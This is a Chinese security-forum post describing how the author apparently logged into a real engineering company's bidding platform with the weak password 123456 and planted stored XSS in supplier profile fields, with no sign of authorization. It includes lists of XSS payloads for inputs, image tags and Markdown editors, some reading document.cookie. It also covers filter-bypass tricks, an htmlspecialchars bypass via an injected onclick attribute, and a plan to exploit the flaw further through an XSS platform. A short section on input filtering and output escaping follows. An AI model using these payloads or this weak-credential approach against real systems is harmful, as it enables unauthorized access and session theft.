安全矩阵

 找回密码
 立即注册
搜索
查看: 2404|回复: 0

实战|对某公司一次弱口令到存储型xss挖掘

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-11-24 10:50:18 | 显示全部楼层 |阅读模式
原文链接 :实战|对某公司一次弱口令到存储型xss挖掘

背景:
某次针对某目标信息搜集无意发现某工程公司的项目招标平台
厚码…求生欲满满呜呜呜

有个供应商登陆,啥也不说先来个弱口令 123456:123456

只能说弱口令yyds!!!!
发现在供应商资料中存在不少输入点,手痒随手一波xss
分享一波常用测试语句:
输入框:
  1.     <script>alert('XSS')</script>

  2.     <scr<script>ipt>alert('XSS')</scr<script>ipt>

  3.     "><script>alert("XSS")</script>

  4.     "><script>alert(String.fromCharCode(88,83,83))</script>
复制代码


图片:
  1.     <img src=x onerror=alert('XSS');>

  2.     <img src=x onerror=alert('XSS')//

  3.     <img src=x onerror=alert(String.fromCharCode(88,83,83));>

  4.     <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

  5.     <img src=x:alert(alt) onerror=eval(src) alt=xss>

  6.     "><img src=x οnerrοr=alert("XSS");>

  7.     "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
复制代码


编辑器:
  1.     [a](javascript:window.onerror=alert;throw%201)

  2.     [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

  3.     [a](j a v a s c r i p t:prompt(document.cookie))

  4.     [a](javascript:prompt(document.cookie))
复制代码

刷一波发现大部分都有过滤,但是[股份/责任人] 栏下有代码被注入成功
语句为:"<script>alert('XSS')</script>"<\

查看该部分DOM源码:
有戏!
针对该点继续测试,构造语句:"<script>alert('XSS')</script>"<



尝试url编码:

这么一通注下来,对刚刚的乱注小总结一下:
  •         发现 / 被转义成 =”” //
  •         /变成 =””
  •         </ script>转义成<=”” script=””> 而且多个/
  •         如///也只被转义成 =”” 没办法重写绕过


并且存在htmlspecialchars()函数: &quot,意味: “””
本地测试发现script便签中存在 &quot 就无法弹窗

所以存在两个问题,一方面要绕过这个&quot,而且要绕过的转义
先说对的绕过思路:
转换法:
  1.     前端限制绕过,直接抓包重放,或者修改html前端代码

  2.     大小写,比如:<scrIPT>alERT(1111)</scRIPT>用来绕过

  3.     拼凑:<scri<script>pt>alert(1111)</scri</script>pt>

  4.     使用注释干扰:

  5.     <scri<!--test-->pt>alert(111)</scri<!--test-->pt>

  6.     编码法:核心思路:后台过滤了特殊字符,比如<script>标签,但该标签可以被各种编码,后台不一定过滤,当浏览器对该编码进行识别时,会翻译成正常的便签,从而执行在使用编码时需要主要编码在输出点是否会被正常是不和翻译!
复制代码


接下来说对&quot的绕过:
`htmlspecialchars()函数是把预定义的字符转换为HTML实体,预定义的字符是:
&(和号)成为 &amp
“ (双引号)成为&quot
‘(单引号)成为&#039
<(小于号)成为&lt
(大于号) 成为&gt
可引用类型:
ENT_COMPAT-默认,仅编码双引号
ENT_QUOMES-编码双引号和单引号
ENT_NOQUOTES-不编码任何引号
`
其他函数
构造语句:
构造对&quot的绕过:
q'οnclick='alert(1111)'
直接产生弹窗:


重新访问页面该xss弹窗还在,说明注入成功
接下来就是利用xss平台对这个注入点进行下一步利用
具体可以参考:
https://www.cnblogs.com/coderge/p/13701664.html
xss常见的防范措施
总的原则:输入做过滤,输出做转义
过滤:根据业务需求进行过滤,比如过滤要求输入手机号,则只允许输入手机号格式的数字
转义:所有输入到前端的数据都根据输出点进行转义,比如输出到HTML中进行HTML实体转义,输入到JS里面的进行JS转义


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 04:26 , Processed in 0.015432 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表